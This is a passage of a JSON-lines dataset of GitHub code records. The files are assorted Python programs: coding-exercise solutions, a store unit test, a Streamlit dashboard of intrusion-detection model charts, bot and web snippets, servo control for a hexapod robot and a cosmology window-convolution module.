int(input(\"Enter a number: \"))\n\nfactorial = math.factorial(num)\n\n\ndef end_zeros():\n new_num = str(factorial)\n count = len(new_num) - len(new_num.rstrip(\"0\"))\n return count\n\nprint(end_zeros())","repo_name":"Yuma-Tsushima07/Python101","sub_path":"Python101/Challenges/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"17463400939","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n nums = {\"M\": 1000, \"D\": 500, \"C\": 100, \"L\": 50, \"X\": 10, \"V\": 5, \"I\": 1}\n total = 0\n for i in range(len(s)):\n int_val = nums[s[i]]\n if i + 1 < len(s) and nums[s[i + 1]] > int_val:\n total -= int_val\n else:\n total += int_val\n return total\n","repo_name":"EdmundMartin/PythonInterviewPrep","sub_path":"leetcode/13_roman_to_integer.py","file_name":"13_roman_to_integer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27733527563","text":"from unittest import TestCase\n\nfrom OnlineStore.src.domain_layer.store.buying_policy.atomic_buying_term import AtomicBuyingTerm\nfrom OnlineStore.src.domain_layer.store.buying_policy.atomic_buying_user_term import AtomicBuyingUserTerm\nfrom OnlineStore.src.domain_layer.store.buying_policy.composite_buying_term import CompositeBuyingTerm\nfrom OnlineStore.src.domain_layer.store.discont_policy.atomic_term import AtomicTerm\nfrom OnlineStore.src.domain_layer.store.discont_policy.composite_term import CompositeTerm\nfrom OnlineStore.src.domain_layer.store.store import Store\n\n\nclass TestCompositeBuyingTerm(TestCase):\n def 
setUp(self):\n product_name = \"milki\"\n quantity_or_price = \"q\"\n operator = \"=\"\n value = 20\n self.basketDTO = basketDTO = {\n \"milki\": (20, 50, \"milki\"), # key - product name, value - (quantity, price, category)\n \"shoko\": (20, 50, \"milki\"),\n \"avocado\": (20, 50, \"veg\")\n }\n self.userDTO = {\n \"age\": 20,\n \"user_name\": \"moshe\"\n }\n self.atomic_term4: AtomicBuyingTerm = AtomicBuyingTerm(product_name, quantity_or_price, operator, value) # True\n self.atomic_term1: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \">\", 18) # True\n self.atomic_term2: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \">\", 22) # False\n self.atomic_term3: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \"<\", 22, no_flag=True) # False\n #self.comp1: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term4, self.atomic_term1) # True\n #self.comp2: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term2, self.atomic_term1) # False\n\n def test_calc_term(self):\n comp1: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term4, self.atomic_term1) # True\n self.assertTrue(comp1.calc_term(self.basketDTO, self.userDTO))\n comp2: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term2, self.atomic_term1) # False\n self.assertFalse(comp2.calc_term(self.basketDTO, self.userDTO))\n self.assertFalse(self.atomic_term3.calc_term(self.basketDTO, self.userDTO))\n comp3 = CompositeBuyingTerm(\"OR\", self.atomic_term3, comp1)\n self.assertTrue(comp3.calc_term(self.basketDTO, self.userDTO))\n\n\n\n\n\n\n\n","repo_name":"ihugtrees/WorkshopSEProject212","sub_path":"OnlineStore/tests/developer_tests/unit_tests/store/buying_policy/test_composite_buying_term.py","file_name":"test_composite_buying_term.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2036433770","text":"import streamlit as st\n# Set a black background for the entire app\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n)\n\nst.title(\"AI in Network Security\")\nst.header(\"Data Statistics\")\n\n\nimage_path = \"networks/normalVSattack.png\"\n\n# Display the image using st.image\nst.image(image_path, caption='Your Image Caption', use_column_width=True)\nimage_path1 = \"networks/top5attacks.png\"\nst.image(image_path1, caption='Your Image Caption', use_column_width=True)\nimage_path2 = \"networks/noOfrestAttacks.png\"\nst.image(image_path2, caption='Your Image Caption', use_column_width=True)\n\nst.subheader(\"Feature Importance\")\n#heading for feature importance\nst.header(\"Binary Classification\")\nimage_path4 = \"networks/featureImpBin.png\"\nst.image(image_path4, caption='Your Image Caption', use_column_width=True)\n\nimage_paths = {\n 'Random Forest': 'networks/rfBin.png',\n 'Naive Bayes': 'networks/naiveBin.png',\n 'Logistic Regression': 'networks/lrBin.png',\n 'MLP': 'networks/mlpBin.png',\n 'K Nearest Neighbors': 'networks/knnBin.png',\n 'Variational Autoencoders': 'networks/vaeBin.png',\n 'Convolutional Neural Networks': 'networks/cnnBin.png',\n 'Isolation Forest': 'networks/isolationBin.png',\n 'Adaboost': 'networks/AdaBoostBin.png'\n # Add more images as needed\n}\n\n# Create a selectbox to choose from the available images\nselected_image_name = st.selectbox(\"Select a model for Binary Classification\", list(image_paths.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_image_name in image_paths:\n selected_image_path = 
image_paths[selected_image_name]\n st.image(selected_image_path, caption=f'Selected Image: {selected_image_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\nst.subheader(\"Feature Importance\")\n#heading for feature importance\nst.header(\"Multiclass Classification\")\nimage_path5 = \"networks/featureImpMulti.png\"\nst.image(image_path5, caption='Your Image Caption', use_column_width=True)\n\nimage_paths = {\n 'Random Forest': 'networks/rfMulti.png',\n 'Naive Bayes': 'networks/naiveMulti.png',\n 'Logistic Regression': 'networks/lrMulti.png',\n 'MLP': 'networks/mlpMulti.png',\n 'K Nearest Neighbors': 'networks/knnMulti.png'\n }\nimage_path6 = \"networks/attacks.png\"\nst.image(image_path6, caption='Your Image Caption', use_column_width=True)\n\n# Create a selectbox to choose from the available images\nselected_image_name = st.selectbox(\"Select a model for Multiclass Classification\", list(image_paths.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_image_name in image_paths:\n selected_image_path = image_paths[selected_image_name]\n st.image(selected_image_path, caption=f'Selected Image: {selected_image_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\n\n# Dictionary mapping attack names to their feature importance images\nimage_paths1 = {\n 'Neptune': 'networks/FIneptune.png',\n 'Satan': 'networks/FISatan.png',\n 'Smurf': 'networks/FIsmurf.png',\n 'IPSweep': 'networks/IPSweep.png',\n 'PortSweep': 'networks/portSweep.png'\n}\n\n# Create a selectbox to choose from the available attacks\nselected_attack_name = st.selectbox(\"Select an attack to see its feature importance\", list(image_paths1.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_attack_name in image_paths1:\n selected_image_path = image_paths1[selected_attack_name]\n st.image(selected_image_path, caption=f'Selected Attack: {selected_attack_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\n\n\n\n\n\n \n","repo_name":"dishachopra/AI-in-Network-Security","sub_path":"networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8814604234","text":"import argparse\nimport os\nimport time\n\nfrom environments.mountain_car import MountainCar\nimport agents.agent\nfrom utils.experiment import Experiment\nfrom utils.helper_functions import ensure_dirs, setup_logger, memory_usage_psutil\nfrom sweeper import Sweeper\n\n\ndef run():\n start = time.time()\n\n parser = argparse.ArgumentParser(description=\"run_file\")\n parser.add_argument('--idx', default=0, type=int, help='identifies run number and configuration')\n parser.add_argument('--config-file', default='config_files/actor_critic.json')\n\n args = parser.parse_args()\n project_root = os.path.abspath(os.path.join(os.path.dirname(__file__)))\n sweeper = Sweeper(os.path.join(project_root, args.config_file))\n cfg = sweeper.parse(args.idx)\n\n cfg.env_instance = MountainCar(cfg)\n agent_class = getattr(agents.agent, cfg.agent_class)\n agent = agent_class(cfg)\n\n log_dir = cfg.get_logdir()\n ensure_dirs([log_dir])\n steps_log = os.path.join(log_dir, 'steps_log')\n steps_logger = setup_logger(steps_log, stdout=True)\n cfg.log_config(steps_logger)\n ep_log = os.path.join(log_dir, 'ep_log')\n ep_logger = setup_logger(ep_log, stdout=False)\n cfg.log_config(ep_logger)\n\n exp = Experiment(agent, cfg.env_instance, 
max_steps=cfg.max_steps, seed=args.idx,\n steps_log=steps_log, ep_log=ep_log)\n exp.run_step_mode()\n\n print(\"Memory used: {:5} MB\".format(memory_usage_psutil()))\n print(\"Time elapsed: {:5.2} minutes\".format((time.time() - start) / 60))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"zaheersm/classic-control","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"23139755452","text":"from queue import PriorityQueue\n\ndef solve(q):\n cnt = 1\n e = q.get()[1][1]\n\n while not q.empty():\n s2, e2 = q.get()[1]\n if s2>=e:\n cnt += 1\n e = e2\n\n return cnt\n\ndef main():\n n =int(input())\n\n q = PriorityQueue()\n\n for i in range(n):\n t = list(map(int, input().split()))\n\n q.put([t[1], t])\n\n print(solve(q))\n\nif __name__ == '__main__':\n main()","repo_name":"spa46/programming_contest","sub_path":"baekjoon/doit/1931/1931.py","file_name":"1931.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71128934910","text":"from discord.ext import commands\nimport discord\nimport data.secrets\nimport time\nimport aiosqlite\nimport os\n\nintents = discord.Intents.all()\n\nbot = commands.Bot(command_prefix=data.secrets.bot_prefix, help_command=None, intents=intents, case_insensitive=True)\n\n@bot.event\nasync def on_ready():\n setattr(bot,\"link_db\",await aiosqlite.connect(r\"data\\databases\\links.db\"))\n setattr(bot,\"star_db\",await aiosqlite.connect(r\"data\\databases\\stars.db\"))\n async with bot.link_db.cursor() as cursor:\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS links (channel_id INTEGER, message_id INTEGER, user_id INTEGER, gdrive_id TEXT, object_size INTEGER)\")\n\n async with bot.star_db.cursor() as cursor:\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS stars (channel_id INTEGER,msgauthorid INTEGER, messageid INTEGER, starboardmsgid INTEGER, numstars INTEGER)\")\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS stats (mem_id INTEGER, received INTEGER, given INTEGER, idols TEXT, beta TEXT)\")\n await bot.change_presence(activity=discord.Game(name=\"Megadrive\"))\n print(\"Bot is ready!\")\n\n_start_time = time.time()\n\n\nif __name__ == '__main__':\n # When running this file, if it is the 'main' file\n # i.e. its not being imported from another python file run this\n for module in data.secrets.module_list:\n bot.load_extension(f\"modules.{module}\")\n \n for file in os.listdir(r\"modules\\required\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n bot.load_extension(f\"modules.required.{file[:-3]}\")\n\n bot.run(data.secrets.bot_token)\n","repo_name":"jsmsj/NOT-cycbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74697359231","text":"from flask import Flask,Blueprint\nfrom src.dynamopipeline import status\n\n\n# Rota /healthcheck\nhealthcheck = Blueprint('healthcheck',__name__)\n\n@healthcheck.route('')\n@healthcheck.route('/')\ndef Healthcheck():\n '''\n \n '''\n msg = \"
    Sistema Online
    \" \n \n return msg, 200\n","repo_name":"clodonil/code-metrics","sub_path":"code-metrics-api/src/controllers/healthcheck/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33647175213","text":"\"\"\"\nKata description:\n\nAcknowledgments:\nI thank yvonne-liu for the idea and for the example tests :)\n\nDescription:\nEncrypt this!\n\nYou want to create secret messages which can be deciphered by the Decipher this! kata. Here are the conditions:\n\nYour message is a string containing space separated words.\nYou need to encrypt each word in the message using the following rules:\nThe first letter needs to be converted to its ASCII code.\nThe second letter needs to be switched with the last letter\nKeepin' it simple: There are no special characters in input.\nExamples:\nencrypt_this(\"Hello\") == \"72olle\"\nencrypt_this(\"good\") == \"103doo\"\nencrypt_this(\"hello world\") == \"104olle 119drlo\"\n\"\"\"\n\n\ndef encrypt_this(text):\n if not text:\n return ''\n temp = text.split(' ')\n result = []\n for i in temp:\n word = ''\n word += str(ord(i[0]))\n tmp = list(i[1:])\n if len(i) > 2:\n tmp[0], tmp[len(tmp) - 1] = tmp[len(tmp) - 1], tmp[0]\n word += ''.join(tmp)\n result.append(word)\n return ' '.join(result)\n\n\nprint(encrypt_this(\"Hello\"))\nprint(encrypt_this(\"good\"))\nprint(encrypt_this(\"hello world\"))\n","repo_name":"Stefi99R/Codewars_kata_solutions","sub_path":"6_kyu_katas/encrypt_this.py","file_name":"encrypt_this.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42530953947","text":"from aoc_tools import *\n\nwith open(\"input.txt\") as f:\n s = f.read()\n\ns = s.strip().split(\"\\n\\n\")\n\ns = [[int(x) for x in y.split(\"\\n\")] for y in s]\n\nprint(max(sum(z) for z in s))\n\ns.sort(key = lambda x : sum(x), reverse=True)\n\nprint(sum(sum(z) for z in s[:3]))\n","repo_name":"nthistle/advent-of-code","sub_path":"2022/day01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"60"} +{"seq_id":"5424607055","text":"# -*- encoding: utf-8 -*-\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom b24online.stats.helpers import GeoIPHelper\n\nlogger = logging.getLogger(__name__)\ngeo = GeoIPHelper()\n\n\ndef get_main_c(obj):\n country = settings.GEO_COUNTRY_DB\n\n # Conditions for countries\n # http://dev.maxmind.com/geoip/legacy/codes/iso3166/\n if obj == 'az':\n return country['Azerbaydjan']\n elif obj == 'am':\n return country['Armenia']\n elif obj == 'by':\n return country['Belarus']\n elif obj == 'ge':\n return country['Georgia']\n elif obj == 'il':\n return country['Israel']\n elif obj == 'kz':\n return country['Kazakhstan']\n elif obj == 'kg':\n return country['Kyrgyzstan']\n elif obj == 'lv':\n return country['Latvia']\n elif obj == 'lt':\n return country['Lithuania']\n elif obj == 'md':\n return country['Moldova']\n elif obj == 'ru':\n return country['Russia']\n elif obj == 'us':\n return country['USA']\n elif obj == 'ua':\n return country['Ukraine']\n else:\n return None\n\n\nclass GeolocationMiddleware(object):\n def process_request(self, request):\n x_forwarded_for = 
request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n\n if geo.is_valid_ip(ip):\n request.session['geo_ip'] = ip\n\n try:\n geo_info = geo.get_geoip_data(ip)\n except KeyError:\n geo_info = None\n request.session['geo_country'] = None\n\n if geo_info:\n request.session['geo_country'] = get_main_c(geo_info.country.iso_code.lower())\n else:\n request.session['geo_country'] = None\n\n request.session.modified = True\n return None\n\n","repo_name":"alexvnukoff/project","sub_path":"b24project/tpp/GeolocationFilterByRegion.py","file_name":"GeolocationFilterByRegion.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41118018067","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\r\n# SPDX-License-Identifier: MIT\r\n\r\nimport time\r\n\r\nfrom board import SCL, SDA\r\nimport busio\r\n\r\n# Import the PCA9685 module. Available in the bundle and here:\r\n# https://github.com/adafruit/Adafruit_CircuitPython_PCA9685\r\nfrom adafruit_motor import servo\r\nfrom adafruit_pca9685 import PCA9685\r\n\r\ni2c = busio.I2C(SCL, SDA)\r\n\r\n# Create a simple PCA9685 class instance.\r\npcaG = PCA9685(i2c, address=65)\r\npcaD = PCA9685(i2c, address=66)\r\n\r\nMAXPULSE=1890\r\n\r\npcaG.frequency = 50\r\npcaD.frequency = 50\r\n\r\n# Create all servo objects, specifying pin number, min and max values.\r\n\r\n#Front left leg\r\n#Hip\r\nhavg = servo.ContinuousServo(pcaG.channels[0], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntavg = servo.ContinuousServo(pcaG.channels[1], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Foot tip\r\npavg = servo.ContinuousServo(pcaG.channels[2], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Middle left leg\r\n#Foot tip\r\npmg = servo.ContinuousServo(pcaG.channels[4], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntmg = servo.ContinuousServo(pcaG.channels[5], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hip\r\nhmg = servo.ContinuousServo(pcaG.channels[6], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Rear left leg\r\n#Hip\r\nharg = servo.ContinuousServo(pcaG.channels[12], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntarg = servo.ContinuousServo(pcaG.channels[13], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Foot tip\r\nparg = servo.ContinuousServo(pcaG.channels[15], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Front right leg\r\n#Foot tip\r\npavd = servo.ContinuousServo(pcaD.channels[0], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntavd = servo.ContinuousServo(pcaD.channels[1], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hip\r\nhavd = servo.ContinuousServo(pcaD.channels[2], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Middle right leg\r\n#Foot tip\r\npmd = servo.ContinuousServo(pcaD.channels[4], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntmd = 
servo.ContinuousServo(pcaD.channels[5], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hip\r\nhmd = servo.ContinuousServo(pcaD.channels[6], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Rear right leg\r\n#Foot tip\r\npard = servo.ContinuousServo(pcaD.channels[15], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Shin\r\ntard = servo.ContinuousServo(pcaD.channels[14], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hip\r\nhard = servo.ContinuousServo(pcaD.channels[13], min_pulse=1300, max_pulse=MAXPULSE)\r\n## We sleep in the loops to give the servo time to move into position.\r\n#Hips at 0\r\nhavg.throttle=0\r\nhavd.throttle=0\r\nhmd.throttle=0\r\nhmg.throttle=0\r\nharg.throttle=0\r\nhard.throttle=0\r\n\r\n#Foot tips at 0\r\npavg.throttle=0\r\npavd.throttle=0\r\npmg.throttle=0\r\npmd.throttle=0\r\nparg.throttle=0\r\npard.throttle=0\r\n\r\n#Shins at 0\r\ntavg.throttle=0\r\ntavd.throttle=0\r\ntmg.throttle=0\r\ntmd.throttle=0\r\ntarg.throttle=0\r\ntard.throttle=0\r\n\r\n#- = downwards\r\n# #+ = upwards\r\nwhile True:\r\n angle=int(input(\"Enter the foot tip angle: \"))\r\n if(angle>0):\r\n pavg.throttle=-1\r\n pavd.throttle=1\r\n pmg.throttle=-1\r\n pmd.throttle=1\r\n parg.throttle=-1\r\n pard.throttle=1\r\n elif(angle<0):\r\n pavg.throttle=1\r\n pavd.throttle=-1\r\n pmg.throttle=1\r\n pmd.throttle=-1\r\n parg.throttle=1\r\n pard.throttle=-1\r\n else:\r\n pavg.throttle=0\r\n pavd.throttle=0\r\n pmg.throttle=0\r\n pmd.throttle=0\r\n parg.throttle=0\r\n pard.throttle=0\r\n time.sleep(0.003*abs(angle))\r\n pavg.throttle=0\r\n pavd.throttle=0\r\n pmg.throttle=0\r\n pmd.throttle=0\r\n parg.throttle=0\r\n pard.throttle=0\r\n \r\n angle5=int(input(\"Enter the shin angle: \"))\r\n if(angle5<0): #Moves up\r\n tavg.throttle=-1\r\n tavd.throttle=1\r\n tmg.throttle=-1\r\n tmd.throttle=1\r\n targ.throttle=-1\r\n tard.throttle=1\r\n elif(angle5>0): #moves down\r\n tavg.throttle=1\r\n tavd.throttle=-1\r\n tmg.throttle=1\r\n tmd.throttle=-1\r\n targ.throttle=1\r\n tard.throttle=-1\r\n else:\r\n tavg.throttle=0\r\n tavd.throttle=0\r\n tmg.throttle=0\r\n tmd.throttle=0\r\n targ.throttle=0\r\n tard.throttle=0\r\n time.sleep(0.003*abs(angle5))\r\n if(angle5>0):\r\n tavg.throttle=-0.2\r\n tavd.throttle=0.2\r\n tmg.throttle=-0.2\r\n tmd.throttle=0.2\r\n targ.throttle=-0.2\r\n tard.throttle=0.2\r\n elif(angle5<0):\r\n tavg.throttle=0.2\r\n tavd.throttle=-0.2\r\n tmg.throttle=0.2\r\n tmd.throttle=-0.2\r\n targ.throttle=0.2\r\n tard.throttle=-0.2\r\n else:\r\n tavg.throttle=0\r\n tavd.throttle=0\r\n tmg.throttle=0\r\n tmd.throttle=0\r\n targ.throttle=0\r\n tard.throttle=0\r\n \r\n\r\n\r\n#i=10\r\n#flag=True\r\n#while True:\r\n# if flag:\r\n# i+=1\r\n# servo4.throttle = -0.5\r\n# else:\r\n# i-=1\r\n# servo4.throttle = 0.5\r\n#\r\n# if(i>=40):\r\n# flag=not flag\r\n# \r\n# elif(i<=10):\r\n# flag=not flag\r\n# time.sleep(0.003*abs(1))\r\n# servo4.throttle=0.0\r\n\r\n#- = upwards\r\n#+ = downwards\r\n#servo5.throttle = -1.0\r\n#angle5=40\r\n#time.sleep(0.003*angle5)\r\n#servo5.throttle=0.0\r\n\r\n\r\n\r\n \r\n\r\npcaG.deinit()\r\npcaD.deinit()","repo_name":"NickVanMarkes/Hexapode","sub_path":"app/mod_classes/tests/test_Servo.py","file_name":"test_Servo.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13230048312","text":"import math\nfrom fractions import Fraction\nimport numpy as np\nimport scipy.interpolate as interp\n\nfrom pyRSD.rsd.tools import RSDSpline as spline\nfrom pyRSD import pygcl\n\n_epsilon = np.finfo(float).eps\n\ndef 
G(p):\n \"\"\"\n Return the function G(p), as defined in Wilson et al 2015.\n\n See also: WA Al-Salam 1953\n\n Returns\n -------\n numer, denom: int\n the numerator and denominator\n \"\"\"\n toret = 1\n for k in range(p+1):\n if k == 0:\n toret *= 1.\n else:\n toret *= (1./2 + k - 1.)\n return int(2**p) * toret, math.factorial(p)\n\ndef get_coefficients(ell, ellprime, as_string=False):\n \"\"\"\n Return the window convolution coefficients\n\n Parameters\n ----------\n ell : int\n the multipole number of the spectra we are convolving\n ellprime : int\n the multipole number of the spectra that is leaking\n power via the convolution\n \"\"\"\n p = 0\n coeffs = []\n qvals = []\n ret_str = []\n for p in range(0, min(ell, ellprime)+1):\n\n numer = []\n denom = []\n\n # numerator of product of G(x)\n for r in [G(ell-p), G(p), G(ellprime-p)]:\n numer.append(r[0])\n denom.append(r[1])\n\n # divide by this\n a,b = G(ell+ellprime-p)\n numer.append(b)\n denom.append(a)\n\n numer.append((2*(ell+ellprime) - 4*p + 1))\n denom.append((2*(ell+ellprime) - 2*p + 1))\n\n q = ell+ellprime-2*p\n numer.append((2*ell+1))\n denom.append((2*q+1))\n\n numer = Fraction(np.prod(numer))\n denom = Fraction(np.prod(denom))\n if not as_string:\n coeffs.append(float(numer/denom))\n qvals.append(q)\n else:\n ret_str.append(\"%s L%d\" %(numer/denom, q))\n\n if not as_string:\n return qvals[::-1], coeffs[::-1]\n else:\n return ret_str[::-1]\n\nclass WindowConvolution(object):\n \"\"\"\n Compute the window-convolved configuration space multipoles\n\n This class takes the ell = 0, 2, 4 (,6) unconvolved power multipoles and\n the window multipoles as input and computes the convolved power multipoles\n\n Parameters\n ----------\n s : array_like, (Ns,)\n the separation vector\n W : array_like, (Ns, Nl)\n the even-ell configuration space window function multipoles,\n where Nl must be >= 5; the first column is the ell=0, second\n is ell=2, etc\n max_ellprime : int, optional\n the maximum value of ``ellprime`` to include when performing\n the linear combination of higher-order multipoles leaking\n into a multipole of order ``ell``\n max_ell : int, optional\n maximum multipole number we want to convolve\n\n Reference\n ----------\n See Wilson et al, MNRAS Volume 464, Issue 3, p.3121-3130, 2017\n \"\"\"\n def __init__(self, s, W, max_ellprime=4, max_ell=4):\n\n # the values of the separation where window is defined\n self.s = s\n self.smin = s.min()\n self.smax = s.max()\n\n # the array of window multipoles\n self.W = W\n\n # ell and ell prime values\n self.max_ellprime = max_ellprime\n self.max_ell = max_ell\n\n # initialize the kernel splines\n self._setup_kernels()\n\n def _setup_kernels(self):\n \"\"\"\n Initialize the splines used to compute the convolution\n kernels for each ell from the discretely-measured\n window multipoles\n \"\"\"\n self.splines = {}\n kern = np.zeros((len(self.s), self.max_ellprime//2+1))\n W = self.W\n\n # ell is the multipole number of the convolved spectra\n for i, ell in enumerate(range(0, self.max_ell+1, 2)):\n\n # ellprime specifies power leakage from other multipoles into ell\n for j, ellprime in enumerate(range(0, self.max_ellprime+1, 2)):\n\n # the coefficients\n qvals, coeffs = get_coefficients(ell, ellprime)\n qinds = [q//2 for q in qvals]\n\n # this term is the sum of coefficients times the window multipoles\n kern[:,j] = np.einsum('...i,i...', W[:,qinds], np.array(coeffs))\n\n # store a spline representation\n self.splines[ell] = [spline(self.s, k) for k in kern.T]\n\n def _get_kernel(self, ell, 
r):\n \"\"\"\n Return the appropriate kernel\n \"\"\"\n splines = self.splines[ell]\n toret = np.zeros((len(r), len(splines)))\n\n idx = (r>=self.smin)&(r<=self.smax)\n for i, s in enumerate(splines):\n toret[idx,i] = s(r[idx])\n\n # set the kernel to one out of bounds\n if i == ell//2:\n toret[~idx,i] = 1.0\n\n return toret\n\n def __call__(self, ells, r, xi, order='F'):\n \"\"\"\n Perform the linear combination of configuration-space multipoles\n with the kernel of window multipoles\n\n Parameters\n ----------\n ells : list of int\n the list of multipole numbers that we are convolving\n r : array_like\n the desired separation vector where the configuration-space multipoles\n are defined\n xi : array_like, shape: (len(r), len(ells))\n the configuration-space multipoles\n order : 'F', 'C'\n memory-order of return array; 'C' is organized by rows, 'F' by columns\n\n Returns\n -------\n xi_conv : array_like\n the convolved xi arrays, given by a linear combination of ``xi`` and\n the window function multipoles\n \"\"\"\n # convolved xi\n conv_xi = np.zeros((len(r), len(ells)), order=order)\n\n # convolve each ell\n for i, ell in enumerate(ells):\n\n # convolution kernel\n kern = self._get_kernel(ell, r)\n\n # check shapes\n if kern.shape[1] != xi.shape[1]:\n npoles = self.max_ellprime//2+1\n\n # need at least a shape of npoles\n if xi.shape[1] > npoles:\n xi = xi[...,:npoles]\n else:\n raise ValueError((\"shape mismatch between kernel and number of xi multipoles; \"\n \"please provide the first %d even multipoles\" %npoles))\n\n conv_xi[:,i] = np.einsum('ij,ij->i', xi, kern)\n\n return conv_xi\n\ndef convolve_multipoles(k, Pell, ells, convolver, qbias=0.7, dry_run=False, legacy=True):\n \"\"\"\n Convolve the input ell = 0, 2, 4 power multipoles, specified by `Pell`,\n with the specified window function.\n\n Parameters\n ----------\n k : array_like, (Nk,)\n the array of wavenumbers where `Pell` is defined -- to avoid convolution\n errors, `k` should probably extend to higher values than the desired `k_out`\n ells : array_like, (Nell,)\n the ell values\n Pell : array_like, (Nk, Nell)\n the ell = 0, 2, 4 power multipoles, defined at `k`\n \"\"\"\n if not legacy:\n\n Nell = len(ells); Nk = len(k)\n\n # FFT the input power multipoles\n xi = np.empty((Nk, Nell), order='F') # column-continuous\n rr = np.empty(Nk)\n\n for i, ell in enumerate(ells):\n pygcl.ComputeXiLM_fftlog(int(ell), 2, k, Pell[:,i], rr, xi[:,i], qbias)\n xi[:,i] *= (-1)**(ell//2)\n\n # convolve\n if dry_run:\n xi_conv = xi.copy()\n else:\n xi_conv = convolver(ells, rr, xi, order='F')\n\n # FFTLog back\n Pell_conv = np.empty((Nk, Nell), order='F')\n kk = np.empty(Nk)\n for i, ell in enumerate(ells):\n pygcl.ComputeXiLM_fftlog(int(ell), 2, rr, xi_conv[:,i], kk, Pell_conv[:,i], -qbias)\n Pell_conv[:,i] *= (-1)**(ell//2) * (2*np.pi)**3\n\n return kk, Pell_conv\n\n else:\n\n shape = Pell.shape\n Nell = len(ells)\n if Nell != shape[-1]:\n raise ValueError(\"shape mismatch between multipole numbers and number of multipoles provided\")\n\n if not all(ell in [0,2,4,6] for ell in ells):\n raise ValueError(\"valid `ell` values are [0,2,4,6]\")\n\n # separation is the first window column\n s = convolver.s\n\n # format the k_out\n k_out = k\n if np.ndim(k_out) == 1:\n k_out = np.repeat(k_out[:,None], Nell, axis=1)\n if k_out.shape[-1] != len(ells):\n raise ValueError(\"input `k_out` must have %d columns for ell=%s multipoles\" %(Nell, str(ells)))\n\n # make the hires version to avoid wiggles when convolving\n if len(k) < 500:\n k_hires = 
